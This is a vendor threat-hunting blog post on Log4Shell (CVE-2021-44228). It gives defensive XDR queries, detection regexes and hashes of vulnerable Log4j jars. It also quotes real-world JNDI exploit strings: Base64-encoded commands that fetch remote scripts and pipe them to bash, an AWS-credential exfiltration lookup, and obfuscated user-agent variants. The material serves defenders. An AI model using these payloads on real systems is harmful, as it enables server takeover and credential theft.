* [Blog](https://origin-researchcenter.paloaltonetworks.com/blog) * [Security Operations](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/) * [Must-Read Articles](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/category/must-read-articles/) * Hunting for Log4j CVE-202... # Hunting for Log4j CVE-2021-44228 (Log4Shell) Exploit Activity [](https://www.facebook.com/sharer/sharer.php?u=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fhunting-for-log4j-cve-2021-44228-log4shell-exploit-activity%2F) [](https://twitter.com/share?text=Hunting+for+Log4j+CVE-2021-44228+%28Log4Shell%29+Exploit+Activity&url=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fhunting-for-log4j-cve-2021-44228-log4shell-exploit-activity%2F) [](https://www.linkedin.com/shareArticle?mini=true&url=https%3A%2F%2Forigin-researchcenter.paloaltonetworks.com%2Fblog%2Fsecurity-operations%2Fhunting-for-log4j-cve-2021-44228-log4shell-exploit-activity%2F&title=Hunting+for+Log4j+CVE-2021-44228+%28Log4Shell%29+Exploit+Activity&summary=&source=) [](https://www.paloaltonetworks.com//www.reddit.com/submit?url=https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/hunting-for-log4j-cve-2021-44228-log4shell-exploit-activity/&ts=markdown) \[\](mailto:?subject=Hunting for Log4j CVE-2021-44228 (Log4Shell) Exploit Activity) Link copied By [Oded Awaskar](https://www.paloaltonetworks.com/blog/author/oded-awaskar/?ts=markdown "Posts by Oded Awaskar"), [Dror Alon](https://www.paloaltonetworks.com/blog/author/dror-alon/?ts=markdown "Posts by Dror Alon"), [Ryan Tracey](https://www.paloaltonetworks.com/blog/author/ryan-tracey/?ts=markdown "Posts by Ryan Tracey"), [Niv Sela](https://www.paloaltonetworks.com/blog/author/niv-sela/?ts=markdown "Posts by Niv Sela") and [Guy Arazi](https://www.paloaltonetworks.com/blog/author/guy-arazi/?ts=markdown "Posts by Guy Arazi") Dec 13, 2021 12 minutes [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown) [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [Cortex XDR](https://www.paloaltonetworks.com/blog/tag/cortex-xdr/?ts=markdown) [Log4J](https://www.paloaltonetworks.com/blog/tag/log4j/?ts=markdown) This post is also available in: [日本語 (Japanese)](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/hunting-for-log4j-cve-2021-44228-log4shell-exploit-activity/?lang=ja "Switch to Japanese(日本語)") ### Overview On December 9, 2021, a critical Remote Code Execution (RCE) vulnerability in Apache's Log4j library was discovered being exploited in the wild. The critical vulnerability, which garnered a CVSS severity score 10 out of 10, enables a remote attacker to execute arbitrary code on an affected server and potentially take complete control of the system. Since the release, mass scanning activity has occurred as threat actors look for vulnerable systems and race to exploit them before they are patched. In this post, we will deep dive into the payloads used by one of the threat actors performing exploitation attempts and demonstrate how blue teams can hunt for suspicious activities that may indicate the network was affected by CVE-2021-44228 both on Windows and Linux based installations and cloud environments. To understand how Cortex XDR can help detect and stop Log4j vulnerability exploits, view the [Apache Log4j blog pos](https://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/)t published by Unit 42. ### Massive Scanning Over the past few days, the Cortex XDR Managed Threat Hunting Team observed a surge in the amount of malicious requests attempting to exploit CVE-2021-44228 across organizations worldwide. ![Image #1: A Surge in Malicious Log4j Exploitation Attempts Over the Past 7 Days](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-25.png) *Image #1: A Surge in Malicious Log4j Exploitation Attempts Over the Past 7 Days* The Managed Threat Hunting team has hand-picked a few of the payloads for further analysis to review the custom payloads used by the threat actors. 1. ${jndi:ldap://45.137\[.\]21.9:1389/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMjUwL2xoLnNofGJhc2g=} 2. ${jndi:ldap://45.155\[.\]205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgMTkyLjk5LjE1Mi4yMDB8fHdnZXQgLXEgLU8tIDIxMi40Ny4yMzcuNjc6NDQzKXxiYXNo} Stage 1: Base64 Deobfuscation Using [CyberChef](https://gchq.github.io/CyberChef/), an analysis of the payload reveals new IOCs which are controlled by the adversary, "192.99\[.\]152.200", "212.47\[.\]237.67 " and "62.210\[.\]130.250". ![](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-26.png) ![Stage 2: Scripts Retrieval and Further Analysis](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-27.png) *Stage 2: Scripts Retrieval and Further Analysis* The Cortex XDR Managed Threat Hunting experts downloaded the artifacts and carefully inspected them. \*"192.99\[.\]152.200" and "212.47\[.\]237.67"\*were downloaded and included the script displayed below. The script also contained a rather polite "introduction" message in the first couple of lines. ![Image 2: A “Polite” Greeting Message](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-28.png) *Image 2: A "Polite" Greeting Message* Sadly, the second stage of the payload was not available on the threat actor site, however the line "sysctl -w vm.nr\_hugepages=128 \> /dev/null 2\>\&1" suggests an intention to mine cryptocurrency as it increases the potential mining ability of the server by up to 20 percent. The script downloaded off "62.210\[.\]130.250" is another downloader for the notorious "Mirai" botnet. Tt is pretty common for the "Mirai" botnet operators to exploit a new Remote Code Execution vulnerability in order to enlarge their zombie horde. ![Image #3: The “Mirai” botnet downloader](https://www.paloaltonetworks.com/blog/wp-content/uploads/2021/12/word-image-29.png) *Image #3: The "Mirai" botnet downloader* ### Hunting for Log4Shell in Your Cloud Environment Cortex XDR Managed Threat Hunting experts have joined efforts with the Cortex XDR research team to detect and hunt exploitation attempts for cloud environments. Some major examples as seen in-the-wild: * Executing the following on vulnerable cloud hosts may lead to exfiltration of cloud credentials: ${jndi:ldap://host/${env:AWS\_SECRET\_ACCESS\_KEY}.${env:AWS\_ACCESS\_KEY\_ID}} * Leveraging the exploitation upon API calls (as those API calls are usually logged) and their associated attributes controlled by the attacker such as the requests parameters of the API call or the user-agent. For example: * * Cloud storage services, modify the object name: projects/\_/buckets/\/objects/${jndi:ldap://\:\/Exploit} * User agent: ${jndi:${lower:l}${lower:d}a${lower:p}://\.bin${upper:a}.io:\/callback} Cortex XDR customers can use this query to hunt additional exploitation attempts within cloud audit logs: | dataset = cloud\_audit\_logs | alter raw\_log\_decoded = replace(replace(replace(lowercase(raw\_log), "%7b", "{"), "%24","$"), "%7d", "}") | filter raw\_log\_decoded ~= "((?:\\%24\\%7B|\\$%7B|\\$\\{|\\$\[^//\]+\\{)(?:j|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+j|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)j\[^//\]+|jn|jnd)(?:n|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+n|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)n\[^//\]+|nd|ndi)?(?:d|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+d|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)n\[^//\]+|di)(?:i|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+i|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)i\[^//\]+))" OR raw\_log\_decoded ~= "\\${jndi" | |----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| Due to the fact that there are so many exploitation attempts, finding a successful exploitation is not an easy task. However, we can leverage the power of all XDR data resources and hunt those malicious connections. By correlating between Cortex XDR cloud, NDR and EDR logs, we are able to extract IOCs from exploitation attempts and match them with established outbound network connections. For example, we can extract the attacker IP address from the payload as seen in Cortex XDR cloud logs, and look for successful outbound connections to this IP address. The same steps can be implemented for DNS queries. Cortex XDR customers can use this query to hunt for successful exploitations by looking at EDR, Firewall and flow logs connections, which can imply a real service or compute instance execution: | dataset = cloud\_audit\_logs | alter raw\_log\_decoded = replace(replace(replace(lowercase(raw\_log), "%7b", "{"), "%24","$"), "%7d", "}") | filter raw\_log\_decoded ~= "((?:\\%24\\%7B|\\$%7B|\\$\\{|\\$\[^//\]+\\{)(?:j|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+j|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)j\[^//\]+|jn|jnd)(?:n|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+n|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)n\[^//\]+|nd|ndi)?(?:d|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+d|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)n\[^//\]+|di)(?:i|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+i|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)i\[^//\]+))" OR raw\_log\_decoded ~= "\\${jndi" | filter lowercase(operation\_name\_orig) not contains "jobservice" and user\_agent != null | alter ip = arrayindex(regextract(user\_agent, "\\b\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\b"), 0) | filter ip != null | fields ip, user\_agent, raw\_log\_decoded | join (dataset = xdr\_data | filter action\_remote\_ip != null and (event\_type = enum.STORY or event\_type = enum.NETWORK) | fields action\_remote\_ip, cloud\_entity, agent\_id | alter cloud\_instance\_name = json\_extract\_scalar(to\_json\_string(cloud\_entity), "$.entity\_name") | dedup action\_remote\_ip, agent\_id, cloud\_instance\_name) as remote\_ips ip = remote\_ips.action\_remote\_ip | fields ip, user\_agent, agent\_id, cloud\_instance\_name, raw\_log\_decoded | |-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| ### Hunting for Log4Shell in Your Network The Cortex XDR Managed Threat Hunting team created a few queries which can enable defenders to determine if the network was affected by the CVE-2021-44228 vulnerability. The queries are divided into two different sections: 1. Detecting potential malicious activity attributed with the Log4j exploitation. 2. Detecting potentially affected hosts , which contain the vulnerable library. Section A: Detecting Hosts Which May Contain the Vulnerable Library 1. Attempting to detect all Log4j jar loading - Trying to find all applications that utilize Log4j is nearly impossible, as it is bundled in a ton of different software. With that being said, we believe that this query will enable you to get at least a **partial** grip of this package usage within your environment. The query will list all process names \*java\* which interacted with a file called \*log4j\* 2. config case\_sensitive = false timeframe=30d | dataset = xdr\_data | filter actor\_process\_image\_name contains "java" | filter (agent\_os\_sub\_type contains "server" or agent\_os\_type = ENUM.AGENT\_OS\_LINUX ) | filter action\_file\_name contains "log4j" and action\_file\_extension = "jar" |fields agent\_hostname, agent\_ip\_addresses, actor\_effective\_username, action\_file\_name, action\_file\_path | dedup agent\_hostname Attempt to target all hosts that contain a file that matches the SHA256 hash of the Log4j vulnerable versions. Reference: https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes/blob/main/sha256sums.txt | dataset = xdr\_data | fields agent\_hostname , action\_file\_sha256, action\_file\_path , actor\_process\_image\_sha256 , actor\_process\_image\_path , causality\_actor\_process\_image\_sha256 , causality\_actor\_process\_image\_path | filter action\_file\_sha256 in ("bf4f41403280c1b115650d470f9b260a5c9042c04d9bcc2a6ca504a66379b2d6", "58e9f72081efff9bdaabd82e3b3efe5b1b9f1666cefe28f429ad7176a6d770ae", "ed285ad5ac6a8cf13461d6c2874fdcd3bf67002844831f66e21c2d0adda43fa4", "dbf88c623cc2ad99d82fa4c575fb105e2083465a47b84d64e2e1a63e183c274e", "a38ddff1e797adb39a08876932bc2538d771ff7db23885fb883fec526aff4fc8", "7d86841489afd1097576a649094ae1efb79b3147cd162ba019861dfad4e9573b", "4bfb0d5022dc499908da4597f3e19f9f64d3cc98ce756a2249c72179d3d75c47", "473f15c04122dad810c919b2f3484d46560fd2dd4573f6695d387195816b02a6", "b3fae4f84d4303cdbad4696554b4e8d2381ad3faf6e0c3c8d2ce60a4388caa02", "dcde6033b205433d6e9855c93740f798951fa3a3f252035a768d9f356fde806d", "85338f694c844c8b66d8a1b981bcf38627f95579209b2662182a009d849e1a4c", "db3906edad6009d1886ec1e2a198249b6d99820a3575f8ec80c6ce57f08d521a", "ec411a34fee49692f196e4dc0a905b25d0667825904862fdba153df5e53183e0", "a00a54e3fb8cb83fab38f8714f240ecc13ab9c492584aa571aec5fc71b48732d", "c584d1000591efa391386264e0d43ec35f4dbb146cad9390f73358d9c84ee78d", "8bdb662843c1f4b120fb4c25a5636008085900cdf9947b1dadb9b672ea6134dc", "c830cde8f929c35dad42cbdb6b28447df69ceffe99937bf420d32424df4d076a", "6ae3b0cb657e051f97835a6432c2b0f50a651b36b6d4af395bbe9060bb4ef4b2", "535e19bf14d8c76ec00a7e8490287ca2e2597cae2de5b8f1f65eb81ef1c2a4c6", "42de36e61d454afff5e50e6930961c85b55d681e23931efd248fd9b9b9297239", "4f53e4d52efcccdc446017426c15001bb0fe444c7a6cdc9966f8741cf210d997", "df00277045338ceaa6f70a7b8eee178710b3ba51eac28c1142ec802157492de6", "28433734bd9e3121e0a0b78238d5131837b9dbe26f1a930bc872bad44e68e44e", "cf65f0d33640f2cd0a0b06dd86a5c6353938ccb25f4ffd14116b4884181e0392", "5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4", "ccf02bb919e1a44b13b366ea1b203f98772650475f2a06e9fac4b3c957a7c3fa", "815a73e20e90a413662eefe8594414684df3d5723edcd76070e1a5aee864616e", "10ef331115cbbd18b5be3f3761e046523f9c95c103484082b18e67a7c36e570c", "dc815be299f81c180aa8d2924f1b015f2c46686e866bc410e72de75f7cd41aae", "9275f5d57709e2204900d3dae2727f5932f85d3813ad31c9d351def03dd3d03d", "f35ccc9978797a895e5bee58fa8c3b7ad6d5ee55386e9e532f141ee8ed2e937d", "5256517e6237b888c65c8691f29219b6658d800c23e81d5167c4a8bbd2a0daa3", "d4485176aea67cc85f5ccc45bb66166f8bfc715ae4a695f0d870a1f8d848cc3d", "3fcc4c1f2f806acfc395144c98b8ba2a80fe1bf5e3ad3397588bbd2610a37100", "057a48fe378586b6913d29b4b10162b4b5045277f1be66b7a01fb7e30bd05ef3", "5dbd6bb2381bf54563ea15bc9fbb6d7094eaf7184e6975c50f8996f77bfc3f2c", "c39b0ea14e7766440c59e5ae5f48adee038d9b1c7a1375b376e966ca12c22cd3", "6f38a25482d82cd118c4255f25b9d78d96821d22bab498cdce9cda7a563ca992", "54962835992e303928aa909730ce3a50e311068c0960c708e82ab76701db5e6b", "e5e9b0f8d72f4e7b9022b7a83c673334d7967981191d2d98f9c57dc97b4caae1", "68d793940c28ddff6670be703690dfdf9e77315970c42c4af40ca7261a8570fa", "9da0f5ca7c8eab693d090ae759275b9db4ca5acdbcfe4a63d3871e0b17367463", "006fc6623fbb961084243cfc327c885f3c57f2eba8ee05fbc4e93e5358778c85") | dedup agent\_hostname , action\_file\_sha256, action\_file\_path , actor\_process\_image\_sha256 , actor\_process\_image\_path , causality\_actor\_process\_image\_sha256 , causality\_actor\_process\_image\_path | |---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| Section B: Detecting Potentially Malicious Activity Attributed with the Log4j Exploitation 1. Given the sheer amount of obfuscation possible on the malicious User-Agents like: 1. ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName} 2. ${JnD${upper:i}:lda${env:XXXX2323:-p}:/ 3. ${jndi:ldap://host/$ 4. ${jndi:${lower:l}${lower:d}a${lower:p}: We've decided to choose a regular expression targeting all permutations of the potential resources. config case\_sensitive = false timeframe=7d | dataset = xdr\_data | filter lowercase(action\_user\_agent) ~= "((?:\\%24\\%7B|\\$%7B|\\$\\{|\\$\[^//\]+\\{)(?:j|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+j|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)j\[^//\]+|jn|jnd)(?:n|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+n|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)n\[^//\]+|nd|ndi)?(?:d|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+d|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)n\[^//\]+|di)(?:i|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)\[^//\]+i|(?:\\-|\\}|\\:|\\:\\-|\\}|\\:|\\$)i\[^//\]+))" OR lowercase(action\_user\_agent) ~= "\\${jndi" | fields action\_user\_agent,agent\_hostname, action\_process\_image\_name, action\_process\_image\_command\_line This means that for Java Child Process, the query will count the number of appearances over the past 90 days, and will list them only if they were spotted for less than 10 times on this specific host.2. Harness the power of "out of the ordinary"- The following query will create a list of the rare Java process causality chains for both action processes and their command lines. Ideally, for any type of payload, you will be able to uncover any unusual processes and their commands. | config case\_sensitive = false timeframe=90d | dataset = xdr\_data | alter ct = current\_time() | alter diff = timestamp\_diff(ct, \_time, "DAY") | filter event\_type = ENUM.FILE and ( actor\_process\_image\_name contains "java" ) and diff \< 7 | dedup action\_process\_image\_command\_line, agent\_hostname, actor\_process\_image\_name | fields action\_file\_path , action\_file\_name,agent\_hostname, actor\_process\_image\_name, action\_process\_image\_name | join conflict\_strategy = left type = left ( dataset = xdr\_data | filter event\_type = ENUM.FILE and ( actor\_process\_image\_name contains "java" ) | comp count(action\_file\_name) as Action\_File\_Days\_count by actor\_process\_image\_name ) as Three\_Months\_Action\_Process (Three\_Months\_Action\_Process.actor\_process\_image\_name = actor\_process\_image\_name) | join conflict\_strategy = left type = left ( dataset = xdr\_data | filter event\_type = ENUM.FILE and ( actor\_process\_image\_name contains "java" ) | comp count(action\_file\_path) as Path\_Days\_count by actor\_process\_image\_name ) as Three\_Months\_CommandLine (Three\_Months\_CommandLine.actor\_process\_image\_name = action\_process\_image\_name ) | dedup agent\_hostname ,actor\_process\_image\_name , action\_process\_image\_name | sort asc Path\_Days\_count , asc Action\_File\_Days\_count | filter Path\_Days\_count \< 10 and Action\_File\_Days\_count \<10 | |-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| ### Conclusion We're probably seeing only the tip of the iceberg; it's only a matter of time until different threat actors and groups will utilize this vulnerability to deploy even more sophisticated malware and payload onto vulnerable servers. Hopefully these queries will be able to assist you in proactively hunting for this threat in your network. Happy Hunting! *** ** * ** *** ## Related Blogs ### [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [#### How Cortex XDR Blocks Log4Shell Exploits with Java Deserialization Exploit Protection](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/how-cortex-xdr-blocks-log4shell-exploits-with-java-deserialization-exploit-protection/) ### [AI and Cybersecurity](https://www.paloaltonetworks.com/blog/security-operations/category/ai-and-cybersecurity/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Use-Cases](https://www.paloaltonetworks.com/blog/security-operations/category/use-cases/?ts=markdown) [#### From Silos to Synergy: How Cortex XDL Transforms XDR to Elevate Threat Detection](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/from-silos-to-synergy-how-cortex-xdl-transforms-xdr-to-elevate-threat-detection/) ### [AI and Cybersecurity](https://www.paloaltonetworks.com/blog/security-operations/category/ai-and-cybersecurity/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [#### Cortex XDR is the Only Endpoint Security Market Leader to Achieve 99% in Both Threat Prevention and Response in AVC EPR](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/cortex-xdr-is-the-only-endpoint-security-market-leader-to-achieve-99-in-both-threat-prevention-and-response-in-avc-epr/) ### [AI and Cybersecurity](https://www.paloaltonetworks.com/blog/security-operations/category/ai-and-cybersecurity/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Use-Cases](https://www.paloaltonetworks.com/blog/security-operations/category/use-cases/?ts=markdown) [#### SE Labs Awards Palo Alto Networks AAA Rating and 100% Prevention Against Ransomware](https://origin-researchcenter.paloaltonetworks.com/blog/security-operations/se-labs-awards-palo-alto-networks-aaa-rating-and-100-prevention-against-ransomware/) ### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown), [Product Features](https://www.paloaltonetworks.com/blog/security-operations/category/product-features/?ts=markdown), [Products and Services](https://www.paloaltonetworks.com/blog/category/products-and-services/?ts=markdown), [Reports](https://www.paloaltonetworks.com/blog/category/reports/?ts=markdown) [#### A Leader in the 2025 Gartner Magic Quadrant for EPP --- 3 Years Running](https://origin-researchcenter.paloaltonetworks.com/blog/2025/07/named-a-leader-gartner-magic-quadrant/) ### [Announcement](https://www.paloaltonetworks.com/blog/category/announcement/?ts=markdown), [Must-Read Articles](https://www.paloaltonetworks.com/blog/security-operations/category/must-read-articles/?ts=markdown), [News and Events](https://www.paloaltonetworks.com/blog/security-operations/category/news-and-events/?ts=markdown) [#### Cortex XDR Named 2025 Gartner Customers' Choice for Endpoint Security](https://origin-researchcenter.paloaltonetworks.com/blog/2025/05/cortex-xdr-named-gartner-customers-choice-endpoint-security/) ### Subscribe to Security Operations Blogs! Sign up to receive must-read articles, Playbooks of the Week, new feature announcements, and more. ![spinner](https://origin-researchcenter.paloaltonetworks.com/blog/wp-content/themes/panwblog2023/dist/images/ajax-loader.gif) Sign up Please enter a valid email. By submitting this form, you agree to our [Terms of Use](https://www.paloaltonetworks.com/legal-notices/terms-of-use?ts=markdown) and acknowledge our [Privacy Statement](https://www.paloaltonetworks.com/legal-notices/privacy?ts=markdown). Please look for a confirmation email from us. If you don't receive it in the next 10 minutes, please check your spam folder. This site is protected by reCAPTCHA and the Google [Privacy Policy](https://policies.google.com/privacy) and [Terms of Service](https://policies.google.com/terms) apply. {#footer} {#footer} ## Products and Services * [AI-Powered Network Security Platform](https://www.paloaltonetworks.com/network-security?ts=markdown) * [Secure AI by Design](https://www.paloaltonetworks.com/precision-ai-security/secure-ai-by-design?ts=markdown) * [Prisma AIRS](https://www.paloaltonetworks.com/prisma/prisma-ai-runtime-security?ts=markdown) * [AI Access Security](https://www.paloaltonetworks.com/sase/ai-access-security?ts=markdown) * [Cloud Delivered Security Services](https://www.paloaltonetworks.com/network-security/security-subscriptions?ts=markdown) * [Advanced Threat Prevention](https://www.paloaltonetworks.com/network-security/advanced-threat-prevention?ts=markdown) * [Advanced URL Filtering](https://www.paloaltonetworks.com/network-security/advanced-url-filtering?ts=markdown) * [Advanced WildFire](https://www.paloaltonetworks.com/network-security/advanced-wildfire?ts=markdown) * [Advanced DNS Security](https://www.paloaltonetworks.com/network-security/advanced-dns-security?ts=markdown) * [Enterprise Data Loss Prevention](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown) * [Enterprise IoT Security](https://www.paloaltonetworks.com/network-security/enterprise-device-security?ts=markdown) * [Medical IoT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown) * [Industrial OT Security](https://www.paloaltonetworks.com/network-security/medical-device-security?ts=markdown) * [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown) * [Next-Generation Firewalls](https://www.paloaltonetworks.com/network-security/next-generation-firewall?ts=markdown) * [Hardware Firewalls](https://www.paloaltonetworks.com/network-security/hardware-firewall-innovations?ts=markdown) * [Software Firewalls](https://www.paloaltonetworks.com/network-security/software-firewalls?ts=markdown) * [Strata Cloud Manager](https://www.paloaltonetworks.com/network-security/strata-cloud-manager?ts=markdown) * [SD-WAN for NGFW](https://www.paloaltonetworks.com/network-security/sd-wan-subscription?ts=markdown) * [PAN-OS](https://www.paloaltonetworks.com/network-security/pan-os?ts=markdown) * [Panorama](https://www.paloaltonetworks.com/network-security/panorama?ts=markdown) * [Secure Access Service Edge](https://www.paloaltonetworks.com/sase?ts=markdown) * [Prisma SASE](https://www.paloaltonetworks.com/sase?ts=markdown) * [Application Acceleration](https://www.paloaltonetworks.com/sase/app-acceleration?ts=markdown) * [Autonomous Digital Experience Management](https://www.paloaltonetworks.com/sase/adem?ts=markdown) * [Enterprise DLP](https://www.paloaltonetworks.com/sase/enterprise-data-loss-prevention?ts=markdown) * [Prisma Access](https://www.paloaltonetworks.com/sase/access?ts=markdown) * [Prisma Browser](https://www.paloaltonetworks.com/sase/prisma-browser?ts=markdown) * [Prisma SD-WAN](https://www.paloaltonetworks.com/sase/sd-wan?ts=markdown) * [Remote Browser Isolation](https://www.paloaltonetworks.com/sase/remote-browser-isolation?ts=markdown) * [SaaS Security](https://www.paloaltonetworks.com/sase/saas-security?ts=markdown) * [AI-Driven Security Operations Platform](https://www.paloaltonetworks.com/cortex?ts=markdown) * [Cloud Security](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown) * [Cortex Cloud](https://www.paloaltonetworks.com/cortex/cloud?ts=markdown) * [Application Security](https://www.paloaltonetworks.com/cortex/cloud/application-security?ts=markdown) * [Cloud Posture Security](https://www.paloaltonetworks.com/cortex/cloud/cloud-posture-security?ts=markdown) * [Cloud Runtime Security](https://www.paloaltonetworks.com/cortex/cloud/runtime-security?ts=markdown) * [Prisma Cloud](https://www.paloaltonetworks.com/prisma/cloud?ts=markdown) * [AI-Driven SOC](https://www.paloaltonetworks.com/cortex?ts=markdown) * [Cortex XSIAM](https://www.paloaltonetworks.com/cortex/cortex-xsiam?ts=markdown) * [Cortex XDR](https://www.paloaltonetworks.com/cortex/cortex-xdr?ts=markdown) * [Cortex XSOAR](https://www.paloaltonetworks.com/cortex/cortex-xsoar?ts=markdown) * [Cortex Xpanse](https://www.paloaltonetworks.com/cortex/cortex-xpanse?ts=markdown) * [Unit 42 Managed Detection \& Response](https://www.paloaltonetworks.com/cortex/managed-detection-and-response?ts=markdown) * [Managed XSIAM](https://www.paloaltonetworks.com/cortex/managed-xsiam?ts=markdown) * [Threat Intel and Incident Response Services](https://www.paloaltonetworks.com/unit42?ts=markdown) * [Proactive Assessments](https://www.paloaltonetworks.com/unit42/assess?ts=markdown) * [Incident Response](https://www.paloaltonetworks.com/unit42/respond?ts=markdown) * [Transform Your Security Strategy](https://www.paloaltonetworks.com/unit42/transform?ts=markdown) * [Discover Threat Intelligence](https://www.paloaltonetworks.com/unit42/threat-intelligence-partners?ts=markdown) ## Company * [About Us](https://www.paloaltonetworks.com/about-us?ts=markdown) * [Careers](https://jobs.paloaltonetworks.com/en/) * [Contact Us](https://www.paloaltonetworks.com/company/contact-sales?ts=markdown) * [Corporate Responsibility](https://www.paloaltonetworks.com/about-us/corporate-responsibility?ts=markdown) * [Customers](https://www.paloaltonetworks.com/customers?ts=markdown) * [Investor Relations](https://investors.paloaltonetworks.com/) * [Location](https://www.paloaltonetworks.com/about-us/locations?ts=markdown) * 